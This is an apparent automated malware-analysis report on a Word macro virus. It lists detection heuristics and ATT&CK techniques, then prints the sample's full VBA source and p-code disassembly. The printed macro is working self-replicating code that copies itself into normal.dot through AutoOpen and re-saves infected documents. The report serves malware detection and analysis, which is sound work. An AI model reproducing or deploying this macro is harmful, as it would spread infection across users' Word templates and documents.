MALICIOUS
Risk Score: 140
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a Microsoft Word document containing a VBA macro with an AutoOpen subroutine. This macro attempts to copy itself into the user's normal.dot template, which is a common technique for macro-based malware to achieve persistence and spread to other documents. The macro's comments explicitly refer to itself as a 'Macro-virus'.
Heuristics 4
- ClamAV: Doc.Trojan.Minimal-63 [critical] CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Trojan.Minimal-63
- VBA macros detected [medium, 1 related finding] OLE_VBA_MACROS: Document contains VBA macro code
- AutoOpen macro [high] OLE_VBA_AUTOOPEN: AutoOpen macro
- Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2931 bytes |

SHA-256: fc1ec4b366875706f5ee79f55a6ca77834396f4b9ed51ff8e645b0b7bcbfd64e
Preview script: first 1,000 lines of the extracted script

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "AutoOpen"
'The SMALLEST Macro-virus in history ;)
'(c) Master of infection
'Queen Hitman Virus inc.
Public Sub MAIN()
Dim nn$
Dim n0$
Dim n1$
Dim n2$
n0$ = ":AutoOpen"
nn$ = WordBasic.[DefaultDir$](2) + "/normal.dot"
n1$ = WordBasic.[FileName$]() + n0$
n2$ = nn$ + n0$
On Error GoTo -1: On Error GoTo cont
WordBasic.MacroCopy n1$, n2$
GoTo okey
cont:
WordBasic.MacroCopy n2$, n1$
On Error GoTo zt
Dim dlg As Object: Set dlg = WordBasic.DialogRecord.FileSaveAs(False)
WordBasic.CurValues.FileSaveAs dlg
dlg.Format = 1
WordBasic.FileSaveAs dlg
GoTo okey
zt:
WordBasic.MsgBox "ERROR!", 16
okey:
WordBasic.MsgBox "OK!", 64
End Sub
' Processing file: /opt/analyzer/scan_staging/d457ffdfa7ef4172902fb9f6bbc59881.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 903 bytes
' Macros/VBA/AutoOpen - 2175 bytes
' Line #0:
'     QuoteRem 0x0000 0x0027 "The SMALLEST Macro-virus in history ;)"
' Line #1:
'     QuoteRem 0x0000 0x0017 "(c) Master of infection"
' Line #2:
'     QuoteRem 0x0000 0x0017 "Queen Hitman Virus inc."
' Line #3:
'     FuncDefn (Public Sub MAIN())
' Line #4:
'     Dim
'     VarDefn nn
' Line #5:
'     Dim
'     VarDefn n0
' Line #6:
'     Dim
'     VarDefn n1
' Line #7:
'     Dim
'     VarDefn n2
' Line #8:
'     LitStr 0x0009 ":AutoOpen"
'     St n0$
' Line #9:
'     LitDI2 0x0002
'     Ld WordBasic
'     ArgsMemLd [DefaultDir$] 0x0001
'     LitStr 0x000B "/normal.dot"
'     Add
'     St nn$
' Line #10:
'     Ld WordBasic
'     ArgsMemLd [FileName$] 0x0000
'     Ld n0$
'     Add
'     St n1$
' Line #11:
'     Ld nn$
'     Ld n0$
'     Add
'     St n2$
' Line #12:
'     OnError <crash>
'     BoS 0x0000
'     OnError cont
' Line #13:
'     Ld n1$
'     Ld n2$
'     Ld WordBasic
'     ArgsMemCall MacroCopy 0x0002
' Line #14:
'     GoTo okey
' Line #15:
'     Label cont
' Line #16:
'     Ld n2$
'     Ld n1$
'     Ld WordBasic
'     ArgsMemCall MacroCopy 0x0002
' Line #17:
'     OnError zt
' Line #18:
'     Dim
'     VarDefn dlg (As Object)
'     BoS 0x0000
'     SetStmt
'     LitVarSpecial (False)
'     Ld WordBasic
'     MemLd DialogRecord
'     ArgsMemLd FileSaveAs 0x0001
'     Set dlg
' Line #19:
'     Ld dlg
'     Ld WordBasic
'     MemLd CurValues
'     ArgsMemCall FileSaveAs 0x0001
' Line #20:
'     LitDI2 0x0001
'     Ld dlg
'     MemSt Format$
' Line #21:
'     Ld dlg
'     Ld WordBasic
'     ArgsMemCall FileSaveAs 0x0001
' Line #22:
'     GoTo okey
' Line #23:
'     Label zt
' Line #24:
'     LitStr 0x0006 "ERROR!"
'     LitDI2 0x0010
'     Ld WordBasic
'     ArgsMemCall MsgBox 0x0002
' Line #25:
'     Label okey
' Line #26:
'     LitStr 0x0003 "OK!"
'     LitDI2 0x0040
'     Ld WordBasic
'     ArgsMemCall MsgBox 0x0002
' Line #27:
'     EndSub
' Line #28:
```